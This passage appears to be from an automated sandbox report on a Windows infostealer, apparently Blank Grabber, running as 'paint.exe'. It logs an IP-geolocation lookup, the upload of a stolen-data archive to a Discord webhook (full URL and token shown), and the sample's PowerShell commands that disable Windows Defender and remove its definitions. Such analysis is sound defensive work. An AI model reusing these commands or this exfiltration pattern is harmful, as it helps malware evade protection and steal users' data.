Jan 5, 2025 10:16:37.206819057 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206826925 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206832886 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206846952 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206854105 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206861019 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206865072 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206882000 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206882000 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206892967 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206899881 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206923008 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206928015 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206939936 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206949949 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206959009 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206971884 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206986904 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206986904 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.207000017 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.207058907 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.207077026 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.207134962 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.207144976 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.207156897 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.207207918 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.207226992 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.207241058 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.207288980 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.207309008 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.207321882 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.215915918 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.216070890 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.216085911 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.216103077 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.216109991 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.216118097 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.216136932 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.216147900 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.216159105 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.216176033 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.216190100 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.218400955 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.848912954 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.848984003 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.849040985 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.849617004 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:38.074127913 CET	49738	80	192.168.2.4	208.95.112.1
Jan 5, 2025 10:16:38.079113007 CET	80	49738	208.95.112.1	192.168.2.4
Jan 5, 2025 10:16:38.079226017 CET	49738	80	192.168.2.4	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 10:16:36.007289886 CET	51966	53	192.168.2.4	1.1.1.1
Jan 5, 2025 10:16:36.014350891 CET	53	51966	1.1.1.1	192.168.2.4
Jan 5, 2025 10:16:36.708606005 CET	50142	53	192.168.2.4	1.1.1.1
Jan 5, 2025 10:16:36.715662956 CET	53	50142	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 10:16:36.007289886 CET	192.168.2.4	1.1.1.1	0xb94c	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jan 5, 2025 10:16:36.708606005 CET	192.168.2.4	1.1.1.1	0x334b	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 10:16:36.014350891 CET	1.1.1.1	192.168.2.4	0xb94c	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 10:16:36.715662956 CET	1.1.1.1	192.168.2.4	0x334b	No error (0)	discord.com	162.159.137.232	A (IP address)	IN (0x0001)	false
Jan 5, 2025 10:16:36.715662956 CET	1.1.1.1	192.168.2.4	0x334b	No error (0)	discord.com	162.159.135.232	A (IP address)	IN (0x0001)	false
Jan 5, 2025 10:16:36.715662956 CET	1.1.1.1	192.168.2.4	0x334b	No error (0)	discord.com	162.159.128.233	A (IP address)	IN (0x0001)	false
Jan 5, 2025 10:16:36.715662956 CET	1.1.1.1	192.168.2.4	0x334b	No error (0)	discord.com	162.159.136.232	A (IP address)	IN (0x0001)	false
Jan 5, 2025 10:16:36.715662956 CET	1.1.1.1	192.168.2.4	0x334b	No error (0)	discord.com	162.159.138.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

discord.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	208.95.112.1	80	2132	C:\Users\user\Desktop\paint.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 10:16:36.020775080 CET	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.3.0
Jan 5, 2025 10:16:36.552270889 CET	381	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 09:16:36 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	162.159.137.232	443	2132	C:\Users\user\Desktop\paint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 09:16:37 UTC	302	OUT	POST /api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0716_bmr9KcFyMQ8vNYrim HTTP/1.1 Host: discord.com Accept-Encoding: identity Content-Length: 728360 User-Agent: python-urllib3/2.3.0 Content-Type: multipart/form-data; boundary=5504fd0b02b225da5837704d2ec650da
2025-01-05 09:16:37 UTC	16384	OUT	Data Raw: 2d 2d 35 35 30 34 66 64 30 62 30 32 62 32 32 35 64 61 35 38 33 37 37 30 34 64 32 65 63 36 35 30 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 0b a9 f9 a3 21 04 00 00 01 0f 62 a9 f1 7d a6 c4 17 a3 ab 38 a0 c1 36 e3 58 c1 d1 c2 29 0f f6 fe 2b 81 d5 ce 3b c7 e7 7c 1d 5f 54 6f 49 d1 fc 18 e3 4e c8 42 bd 68 c0 77 63 6b 28 a2 7d 8d 47 a3 6c b5 8b c4 a6 5b fc 8e 42 54 18 a6 c1 09 dc 1e e3 c8 11 32 62 c7 0d 4c c5 07 f4 32 37 0a ce 20 Data Ascii: --5504fd0b02b225da5837704d2ec650daContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!b}86X)+;\|_ToINBhwck(}Gl[BT2bL27
2025-01-05 09:16:37 UTC	16384	OUT	Data Raw: 0e 23 cd 5c de 93 8d 8c c1 d6 10 af 5c cc 31 ce bf 35 51 9a 19 23 10 e3 4d 6c 63 1f c3 a4 b8 d6 f4 b2 be e0 1a 6b 4f 5e 74 c6 ac 25 0b 41 60 71 aa c0 60 4a 81 c5 d7 bb f2 3d 3a d0 8f e7 8d 62 bc 73 d1 a9 06 bd 49 0d 10 f5 b9 a8 e4 db f3 c0 d0 69 53 46 e9 f6 5f b6 8f ca 8b 89 3f 70 0e 68 e2 06 73 07 92 8e a4 d3 46 03 04 86 f4 c2 9e d7 a4 d1 f3 0f 65 a2 91 06 94 c4 70 3f d9 8e c1 00 8d 59 12 0a de 58 b7 1f f5 3d cc d0 88 3f d2 c4 6c 67 b4 d7 6c 44 55 e9 79 5a 5b ba 11 44 23 30 35 3c fe af aa 3b 61 93 4f c4 a2 76 39 e4 f9 6b 3e 55 2b 0e c4 e1 0d c8 c6 8f ba 88 52 04 18 fa d5 ca b6 53 80 de 43 f1 94 3e 24 56 09 f2 7d 7e d6 27 b4 1a 11 6f b8 b5 e2 c1 6b 31 20 6f 1a 1b a3 82 46 c7 a3 aa 44 97 63 98 3b 4a 67 00 7e 49 80 e7 87 73 a4 aa e0 b1 97 3f 88 a3 c6 7a cd Data Ascii: #\\15Q#MlckO^t%A`q`J=:bsIiSF_?phsFep?YX=?lglDUyZ[D#05<;aOv9k>U+RSC>$V}~'ok1 oFDc;Jg~Is?z
2025-01-05 09:16:37 UTC	16384	OUT	Data Raw: 1b d9 af 17 30 63 1b 93 c0 e8 16 38 92 60 aa 2d b3 33 de f3 26 49 0a 8f 34 ec a9 15 d5 ba 44 c1 1b f7 0c 9f fd d2 36 9b 4d 84 bd 25 c2 db 34 b5 76 8b 6d c3 ef a5 f3 66 8d 59 9a c8 7c 23 7b 42 f3 45 b5 88 00 f6 71 13 cd 6c 53 f5 3f 7c f2 62 11 8f c7 67 cd f3 a8 7b f2 76 85 77 bd b3 f2 1e 1b 58 53 df dc db e8 e1 3f 4e 17 e4 b3 34 72 4b 51 b0 38 dc 11 94 29 e1 3b 8e 39 40 e9 e4 24 ff 44 38 08 ea 77 0e 9d a1 d2 f6 74 7a 8c f3 82 04 01 f9 d9 4f 01 d9 11 f4 f8 84 b8 85 d0 60 80 ec 5c 74 51 6a 66 71 4c 34 ad 91 c9 cf 78 35 35 3f df 7e 88 04 cc db 97 06 a9 ee c4 8a f2 48 48 ea 49 10 81 00 4d 00 ee 37 30 75 83 13 d9 bf 2b 32 5a 85 d8 53 ea b0 12 4f ec 25 04 7b 6f dd 2a be 6b 8f 34 32 8d 82 8a 57 eb e4 f3 4d 7e 1c be ae d9 9f 0c 5c 76 c6 b3 f3 a7 d1 c0 91 12 87 10 Data Ascii: 0c8`-3&I4D6M%4vmfY\|#{BEqlS?\|bg{vwXS?N4rKQ8);9@$D8wtzO`\tQjfqL4x55?~HHIM70u+2ZSO%{o*k42WM~\v
2025-01-05 09:16:37 UTC	16384	OUT	Data Raw: d2 3d b5 b4 aa 7c 5d 70 90 7f 2e 2b db d4 1f 0a bf 10 ef 6b eb 08 fb 20 db df 73 f5 ee c8 5d a4 57 5c 94 88 77 9e 24 9b 9e f9 e3 1b b5 98 37 8f 23 1a 68 36 3c ac 25 31 79 f3 fc ce 40 48 80 3a fa 18 37 57 b2 96 f8 cd fd 90 4b fe 96 aa bb 3e 0f ff e5 64 b6 58 c6 70 24 ee d8 bf 8f 55 f7 79 02 79 60 d5 37 0b f5 c1 01 25 a5 83 11 fa c4 97 7c d5 a4 b6 91 d9 8f 39 a9 0d 01 1b 36 8f f2 9f 42 80 16 06 2b 38 ea 29 62 d4 e0 b7 e3 8a a1 5c ee 52 f5 f7 a5 0c dd 4d e9 f9 f0 5d f4 ab 42 36 22 a3 4e 1f 98 d6 cd 28 76 5a 73 eb 53 1b 33 c3 f6 4f 59 ed 23 25 c8 ab 12 e0 5d 9e 20 b2 ae f7 76 92 70 51 b7 34 b6 bd 43 35 7e f9 5c ad 58 1d 14 97 86 50 42 1e 11 b0 56 00 af 78 b1 09 34 4a d5 99 1b ee ec 93 f1 64 dc 55 d5 bc bd e9 4a 9f 61 0a 1a 47 04 75 8a a6 ef 35 7d ef b0 e5 16 Data Ascii: =\|]p.+k s]W\w$7#h6<%1y@H:7WK>dXp$Uyy`7%\|96B+8)b\RM]B6"N(vZsS3OY#%] vpQ4C5~\XPBVx4JdUJaGu5}
2025-01-05 09:16:37 UTC	16384	OUT	Data Raw: 8c 3c 65 c6 3c 25 a9 22 41 bf 6c 1d 08 7f a3 ad ef e9 2f c1 19 5d bf 11 c1 d0 8f d4 d4 9a 11 ba 24 ce 96 4c 42 69 a5 61 4b 59 32 9c 65 9c af 14 d9 5a ae 3d df 69 cd 7c 7a cf 66 0e d5 2c 53 a6 fd 9c c6 b5 d4 6c 6d 0a a6 ab f7 47 da d4 67 db b3 a8 90 39 f3 cb 2f 55 51 ae ed ae cf aa 85 94 58 72 a2 1a ce 17 47 38 e1 4a c9 c1 73 4d 69 41 41 7e ef ce f4 e6 00 cb df 8e 3b 8b c7 f3 7e 3a 84 c2 23 3d 81 0a 2e 7d 16 e7 f1 23 4a f6 57 96 65 03 e9 05 90 f4 28 f3 18 9b 0c af 47 c1 fb 40 c4 71 48 f0 35 e5 38 3d 7f 39 d3 1a 8c 14 14 41 d7 cd ed d2 9d 9e 27 59 87 e5 4b 2c 91 0e aa aa b1 15 b6 cd f6 b3 28 33 d6 f2 c3 73 ad e0 cc e4 76 8a 3c e5 40 ff 6d 13 76 de ce 74 35 d0 9e b4 e7 01 1e b0 32 3c 26 5b dc 15 4c ec 5b b2 01 e8 81 14 cd d3 46 0b a4 86 c0 d6 b1 bb 3c d9 3b Data Ascii: <e<%"Al/]$LBiaKY2eZ=i\|zf,SlmGg9/UQXrG8JsMiAA~;~:#=.}#JWe(G@qH58=9A'YK,(3sv<@mvt52<&[L[F<;
2025-01-05 09:16:37 UTC	16384	OUT	Data Raw: 39 ce 97 c2 5b ee 99 7c 2c 00 40 bc fb 4a 2c de e4 a5 8a 11 4e b1 6a 7f 31 d6 b1 9b 4b 73 64 a7 fe e2 c0 4b 45 1f 21 90 ac 12 99 96 02 5e e5 1b 91 db ad 17 96 a1 c1 2f 4b ea d7 4b 99 65 79 b4 cf 9f 78 55 ce b5 41 2a 8c d7 53 f5 71 f8 81 e9 cc f5 7c 87 2d ae c3 69 ea ea 49 34 6c c9 c4 ea 16 61 91 c4 5f 59 e7 07 0f 0c 19 8b 52 44 ce 2c f5 e9 31 98 f2 a8 6d 5c 26 a3 4d 83 96 e5 7e 7e 23 64 a6 d5 df 78 ce e4 00 5b fa 33 ae cd 42 45 36 51 d2 c3 c3 6d 7f 32 15 ab 5d ee f9 be 5c 40 dd d7 22 59 d6 bf ca e5 d0 2f a1 db dd 1c 8a 7f c2 fe 75 c9 67 d2 b5 44 c9 cb 0c 7d 91 58 25 de b4 3a 54 fb 0f 9b fb 07 16 ae a7 de 64 90 06 9d ea df 67 1f 92 1f b4 96 eb 84 60 74 49 b4 f7 73 ef 1e 3a 97 c3 59 a9 6e df 1b 7d 01 37 4a 78 67 b4 bd cb 87 13 22 f5 31 e3 20 fb 11 38 85 a8 Data Ascii: 9[\|,@J,Nj1KsdKE!^/KKeyxUA*Sq\|-iI4la_YRD,1m\&M~~#dx[3BE6Qm2]\@"Y/ugD}X%:Tdg`tIs:Yn}7Jxg"1 8
2025-01-05 09:16:37 UTC	16384	OUT	Data Raw: 8a bc c1 7e ca 13 f1 b7 df 57 dc 7f b9 92 47 d2 d4 30 4e da 46 68 2d 80 f0 b6 2b 0c 30 cf fb ef 97 02 64 32 01 45 72 fc 3a a0 d2 a8 0a f5 6a fc 31 50 a3 37 7d bb 33 dd 71 05 d4 db 11 e7 ac 90 25 15 b9 e5 68 8e 5a 29 a9 8a 97 2e dd fc c9 5e 36 f2 f7 84 5a 34 48 c8 5d 0f cd 22 b6 3f 74 27 6a 8b 6c 08 a2 e2 eb 8c 1f 3a ed 3c 77 0b 29 0d 8a 83 22 17 bf 6b c0 b2 7c 3d d8 b3 4a 81 2d a5 93 77 16 cc 2a 8d 0f 7a 59 c9 ae ee af 80 2d 0d 78 a9 32 62 34 48 d4 0d d1 dc 31 9a ff 42 1d c5 1a 7c 8c 7e 2d c5 6b 44 19 b5 35 99 7b 87 d0 fb 07 26 6f de 79 9f e4 7d 4d fd ed f4 91 44 78 ca 0b f0 3b 3b 07 3f 1a c7 d6 53 f7 03 ee b0 d8 00 a3 9e c3 50 9a 31 3c b5 6c 1e a0 be 45 d4 69 c0 85 a1 00 9b 61 a7 bf 14 e3 fc 5c 18 ac fc c0 a9 6b a6 80 d5 34 6b 69 f6 47 d4 cb 4e 24 78 60 Data Ascii: ~WG0NFh-+0d2Er:j1P7}3q%hZ).^6Z4H]"?t'jl:<w)"k\|=J-w*zY-x2b4H1B\|~-kD5{&oy}MDx;;?SP1<lEia\k4kiGN$x`
2025-01-05 09:16:37 UTC	16384	OUT	Data Raw: 70 58 55 c1 8c a5 da b0 1d f1 e8 83 c2 86 c5 70 6e e8 4d af 87 f6 5e cf 74 6c fe 57 f9 c9 fe 7a 79 07 64 b2 3a 44 1c d2 7c 06 7d 64 1e ff e4 83 5c f1 76 73 32 c5 2e c0 d9 40 ab a5 8c 8f 37 af 2e 4b cd 68 36 11 1a f6 2c f7 b1 da 44 e9 8f 1d f8 4b b8 8a 9a ea e7 a3 f8 b9 ad 16 c5 c6 0f 1b dc bf 2a 2d 1f 3e a2 32 af f9 f3 4f c8 d5 91 c2 54 aa ad f0 91 a9 58 da dd 29 b1 c3 e9 97 11 a4 7a 1d 84 9b d7 0d 1b f1 98 52 16 3e b8 3c 1c 9a 4a 2d 5e a1 9c be 39 e6 9a 51 7e c1 dd b4 2e 57 36 5b 04 64 13 62 54 82 31 aa 71 40 2a 1e cd ae d5 82 b1 e1 2a a4 69 0f b8 17 de 66 80 f8 89 43 89 fd d9 43 cd b1 e8 8e 31 ac 39 60 a5 65 f8 54 56 8a 66 04 43 91 0b 3c 27 ed e2 93 14 90 e2 90 63 32 70 99 af 2c 8f 49 c2 48 50 5e a1 58 74 a6 4c 15 f1 d6 67 16 50 8b f7 20 8e c5 9e a4 26 Data Ascii: pXUpnM^tlWzyd:D\|}d\vs2.@7.Kh6,DK->2OTX)zR><J-^9Q~.W6[dbT1q@*ifCC19`eTVfC<'c2p,IHP^XtLgP &
2025-01-05 09:16:37 UTC	16384	OUT	Data Raw: b2 a6 a5 7f 0b 87 1c 83 65 0d ab 5d 0c b1 1f e5 a8 d1 49 89 4e 6e 84 8e 58 e8 41 d6 78 1d a2 80 99 a0 d6 7f b6 d0 58 01 70 38 4b d2 1a 66 c3 f7 03 58 72 ad ad 95 01 97 93 46 95 9c 90 6e 51 9e ef 44 b1 ad 11 ac 2f a9 c9 c4 59 e4 07 cb b4 36 12 17 89 38 01 53 bd 9f 92 92 4d 35 7c ad 5f cf e2 a0 47 51 31 52 2c 9f fe 80 e8 50 b1 c0 74 14 ec 83 e5 10 c5 d5 3d c3 48 72 b5 0b 4f 83 9a 15 c4 01 88 36 91 c1 7d 4e 73 41 d6 10 5c e9 e1 83 77 b3 b6 af c4 6b c1 57 6a 6a d6 27 dc 9d 88 5e e8 a6 c1 f2 ed f2 5f ad 3b cd 8b 68 a5 51 75 6e 5d e3 0c 4d d2 56 0c 51 6d de 26 77 b9 5f fe 22 8f b1 16 e3 e6 49 4d 38 ed bd 54 e8 bc 08 dd ae 41 5f ba d4 9a b7 2b f6 af 4b bb 17 10 b5 11 b4 8a c2 c0 1e 90 ca 29 3c 46 51 92 af c5 c9 68 70 3b ec 86 0f 5e 5a 3a dc 98 14 33 6f f8 8b 8a Data Ascii: e]INnXAxXp8KfXrFnQD/Y68SM5\|_GQ1R,Pt=HrO6}NsA\wkWjj'^_;hQun]MVQm&w_"IM8TA_+K)<FQhp;^Z:3o
2025-01-05 09:16:37 UTC	16384	OUT	Data Raw: 3d 8b 0d 51 a4 03 4f 8b ac e1 61 12 7e dc 04 ff 69 45 d5 c4 71 f7 47 da 62 5c 76 f5 71 86 d5 a2 46 f3 8c e3 84 6b 97 0b 02 87 a4 37 c7 50 7d a2 f6 72 67 45 0f 2c 7a fb 84 19 73 c4 f0 4f 41 1a 25 be 98 10 86 38 7d 02 f4 a5 ff 4f 78 90 cc 54 1f cf af ba 31 78 96 8d 8a a4 a7 f0 09 2a 99 75 a6 ec 23 1a ce 5c ff 23 2e cd bc ef 1b 3a a3 0d 94 c1 cc 8e 17 94 7b cc ad e4 74 c6 02 99 95 8c f5 a3 4f b4 10 ec 35 38 81 43 41 15 ad c0 fb 10 a9 c2 1c 22 a5 38 af f9 10 88 5d 01 88 34 cc 1e a0 72 b3 9f 11 63 c8 5a 29 13 93 0c 80 c8 dc 07 53 c5 74 f9 39 8e c3 bb 14 79 18 21 0b 98 7c b0 4f 00 2f 5e 8e 2b 30 38 2f e4 9e 3e 7e 20 33 a3 df b7 3a 31 55 39 33 d2 74 19 52 d3 e5 4d 74 4c 9c ea f7 40 23 a2 ab 25 5c 48 11 7f 00 b3 a6 e6 db 6c 3b 51 2a 01 ef 11 bc dc 6d 8d 07 9a 2a Data Ascii: =QOa~iEqGb\vqFk7P}rgE,zsOA%8}OxT1xu#\#.:{tO58CA"8]4rcZ)St9y!\|O/^+08/>~ 3:1U93tRMtL@#%\Hl;Qm*
2025-01-05 09:16:37 UTC	1263	IN	HTTP/1.1 404 Not Found Date: Sun, 05 Jan 2025 09:16:37 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1736068599 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TD8%2FG%2Boni%2BnWwIq8RmUSuAHrutMTwdF2QH58uv%2BCizcFnzmM5qaI1%2BrUWuEisXltQ5GQ6yAgFnPCohw6oWmBtNJO%2BAGl5o8QX8vxChfza9%2FfuxfjkpWiZyakFHdx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=b23ede6a2683bc41436838bfd0b40396a9211394-1736068597; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=WzXRjZZPUtRwjwHI2vQUBHc9MsDw.9t6IlQXS7UdZ5g-1736068597806-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8fd25edcdfaa42db-EWR

Target ID:	0
Start time:	04:16:02
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\paint.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\paint.exe"
Imagebase:	0x7ff6f0bd0000
File size:	8'809'834 bytes
MD5 hash:	14F0421574FD16A0A6A7AC20FE22482B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1673300933.0000023393145000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1673300933.0000023393147000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:16:03
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\paint.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\paint.exe"
Imagebase:	0x7ff6f0bd0000
File size:	8'809'834 bytes
MD5 hash:	14F0421574FD16A0A6A7AC20FE22482B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2003846185.000002077225D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:16:05
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:16:05
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:16:05
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:16:05
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()""
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:16:05
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
